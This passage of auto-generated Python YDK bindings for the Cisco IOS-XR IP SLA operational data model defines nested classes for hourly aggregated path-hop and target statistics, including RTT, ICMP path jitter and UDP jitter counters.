self.operation_time = None
self.return_code = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.update_count = None
self.ok_count = None
self.disconnect_count = None
self.timeout_count = None
self.busy_count = None
self.no_connection_count = None
self.dropped_count = None
self.internal_error_count = None
self.sequence_error_count = None
self.verify_error_count = None
self._segment_path = lambda: "common-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
"""
Operation Specific Stats
.. attribute:: icmp_path_jitter_stats
icmp path jitter stats
**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats>`
.. attribute:: udp_jitter_stats
udp jitter stats
**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats>`
.. attribute:: op_type
op type
**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats, self).__init__()
self.yang_name = "specific-stats"
self.yang_parent_name = "distribution-interval"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('op_type', YLeaf(YType.enumeration, 'op-type')),
])
self.op_type = None
self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats()
self.icmp_path_jitter_stats.parent = self
self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
self._children_yang_names.add("icmp-path-jitter-stats")
self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats()
self.udp_jitter_stats.parent = self
self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
self._children_yang_names.add("udp-jitter-stats")
self._segment_path = lambda: "specific-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
"""
icmp path jitter stats
.. attribute:: source_address
IP Address of the source
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: dest_address
IP Address of the destination
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: hop_address
IP address of the hop in the path
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: packet_interval
Interval between echos in ms
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packet_count
Number of Echo replies received
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_count
Number of packets lost
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sequence_count
Number of out of sequence packets
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_sample_count
Number of discarded samples
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_errors_count
Number of packets with data corruption
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_error_count
Number of packets dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter
Jitter value for this node in the path
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum
Sum of positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum2
Sum of squares of positive jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pos_jitter_min
Minimum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_max
Maximum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_count
Number of positive jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum
Sum of negative jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_min
Minimum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_max
Maximum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum2
Sum of squares of negative jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: neg_jitter_count
Number of negative jitter values
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats, self).__init__()
self.yang_name = "icmp-path-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('source_address', YLeaf(YType.str, 'source-address')),
('dest_address', YLeaf(YType.str, 'dest-address')),
('hop_address', YLeaf(YType.str, 'hop-address')),
('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('packet_count', YLeaf(YType.uint32, 'packet-count')),
('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
('jitter', YLeaf(YType.uint32, 'jitter')),
('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
])
self.source_address = None
self.dest_address = None
self.hop_address = None
self.packet_interval = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.packet_count = None
self.packet_loss_count = None
self.out_of_sequence_count = None
self.discarded_sample_count = None
self.verify_errors_count = None
self.dropped_error_count = None
self.jitter = None
self.pos_jitter_sum = None
self.pos_jitter_sum2 = None
self.pos_jitter_min = None
self.pos_jitter_max = None
self.pos_jitter_count = None
self.neg_jitter_sum = None
self.neg_jitter_min = None
self.neg_jitter_max = None
self.neg_jitter_sum2 = None
self.neg_jitter_count = None
self._segment_path = lambda: "icmp-path-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
"""
udp jitter stats
.. attribute:: jitter_in
Input Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter_out
Output Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_sd
Packets lost in source to destination (SD) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_ds
Packets lost in destination to source (DS) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_out_of_sequence
Packets out of sequence
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_mia
Packets missing in action (cannot determine if theywere lost in SD or DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_skipped
Packets which are skipped
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_late_arrivals
Packets arriving late
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_invalid_tstamp
Packets with bad timestamps
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_errors_count
Number of internal errors
**type**\: int
**range:** 0..4294967295
.. attribute:: busies_count
Number of busies
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_sd_sum2
Sum of squares of positive jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_sd_min
Minimum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_max
Maximum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_count
Number of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_sd_sum2
Sum of squares of negative jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_sd_min
Minimum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_max
Maximum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_count
Number of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_ds_sum2
Sum of squares of positive jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_ds_min
Minimum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_max
Maximum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_count
Number of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_ds_sum2
Sum of squares of negative jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_ds_min
Minimum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_max
Maximum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_count
Number of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_count
Number of probe/probe\-response pairs used to compute one\-way statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_min
Minimum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_max
Maximum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum
Sum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum2
Sum of squares of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: one_way_ds_min
Minimum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_max
Maximum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum
Sum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum2
Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec)
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats, self).__init__()
self.yang_name = "udp-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
('busies_count', YLeaf(YType.uint32, 'busies-count')),
('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
])
self.jitter_in = None
self.jitter_out = None
self.packet_loss_sd = None
self.packet_loss_ds = None
self.packet_out_of_sequence = None
self.packet_mia = None
self.packet_skipped = None
self.packet_late_arrivals = None
self.packet_invalid_tstamp = None
self.internal_errors_count = None
self.busies_count = None
self.positive_sd_sum = None
self.positive_sd_sum2 = None
self.positive_sd_min = None
self.positive_sd_max = None
self.positive_sd_count = None
self.negative_sd_sum = None
self.negative_sd_sum2 = None
self.negative_sd_min = None
self.negative_sd_max = None
self.negative_sd_count = None
self.positive_ds_sum = None
self.positive_ds_sum2 = None
self.positive_ds_min = None
self.positive_ds_max = None
self.positive_ds_count = None
self.negative_ds_sum = None
self.negative_ds_sum2 = None
self.negative_ds_min = None
self.negative_ds_max = None
self.negative_ds_count = None
self.one_way_count = None
self.one_way_sd_min = None
self.one_way_sd_max = None
self.one_way_sd_sum = None
self.one_way_sd_sum2 = None
self.one_way_ds_min = None
self.one_way_ds_max = None
self.one_way_ds_sum = None
self.one_way_ds_sum2 = None
self._segment_path = lambda: "udp-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class Target(Entity):
"""
Distribution statistics for the target
node
.. attribute:: distribution_intervals
Table of distribution intervals for a particular hop
**type**\: :py:class:`DistributionIntervals <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target, self).__init__()
self.yang_name = "target"
self.yang_parent_name = "distributed"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("distribution-intervals", ("distribution_intervals", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.distribution_intervals = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals()
self.distribution_intervals.parent = self
self._children_name_map["distribution_intervals"] = "distribution-intervals"
self._children_yang_names.add("distribution-intervals")
self._segment_path = lambda: "target"
class DistributionIntervals(Entity):
"""
Table of distribution intervals for a particular
hop
.. attribute:: distribution_interval
1\-hour aggregated statistics for a hop in a path\-enabled operation
**type**\: list of :py:class:`DistributionInterval <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals, self).__init__()
self.yang_name = "distribution-intervals"
self.yang_parent_name = "target"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("distribution-interval", ("distribution_interval", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval))])
self._leafs = OrderedDict()
self.distribution_interval = YList(self)
self._segment_path = lambda: "distribution-intervals"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals, [], name, value)
class DistributionInterval(Entity):
"""
1\-hour aggregated statistics for a hop in a
path\-enabled operation
.. attribute:: distribution_index (key)
Distribution Interval
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval, self).__init__()
self.yang_name = "distribution-interval"
self.yang_parent_name = "distribution-intervals"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['distribution_index']
self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('distribution_index', YLeaf(YType.int32, 'distribution-index')),
])
self.distribution_index = None
self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.CommonStats()
self.common_stats.parent = self
self._children_name_map["common_stats"] = "common-stats"
self._children_yang_names.add("common-stats")
self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats()
self.specific_stats.parent = self
self._children_name_map["specific_stats"] = "specific-stats"
self._children_yang_names.add("specific-stats")
self._segment_path = lambda: "distribution-interval" + "[distribution-index='" + str(self.distribution_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval, ['distribution_index'], name, value)
class CommonStats(Entity):
"""
Common Stats
.. attribute:: operation_time
Operation Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
Return code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: update_count
Number of updates processed
**type**\: int
**range:** 0..4294967295
.. attribute:: ok_count
Number of updates with Okay return code
**type**\: int
**range:** 0..4294967295
.. attribute:: disconnect_count
Number of updates with Disconnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: timeout_count
Number of updates with Timeout return code
**type**\: int
**range:** 0..4294967295
.. attribute:: busy_count
Number of updates with Busy return code
**type**\: int
**range:** 0..4294967295
.. attribute:: no_connection_count
Number of updates with NotConnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_count
Number of updates with Dropped return code
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_error_count
Number of updates with InternalError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: sequence_error_count
Number of updates with SeqError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_error_count
Number of updates with VerifyError return code
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.CommonStats, self).__init__()
self.yang_name = "common-stats"
self.yang_parent_name = "distribution-interval"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('operation_time', YLeaf(YType.uint64, 'operation-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('update_count', YLeaf(YType.uint32, 'update-count')),
('ok_count', YLeaf(YType.uint32, 'ok-count')),
('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
('busy_count', YLeaf(YType.uint32, 'busy-count')),
('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
])
self.operation_time = None
self.return_code = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.update_count = None
self.ok_count = None
self.disconnect_count = None
self.timeout_count = None
self.busy_count = None
self.no_connection_count = None
self.dropped_count = None
self.internal_error_count = None
self.sequence_error_count = None
self.verify_error_count = None
self._segment_path = lambda: "common-stats"
def __setattr__(self, name, value):
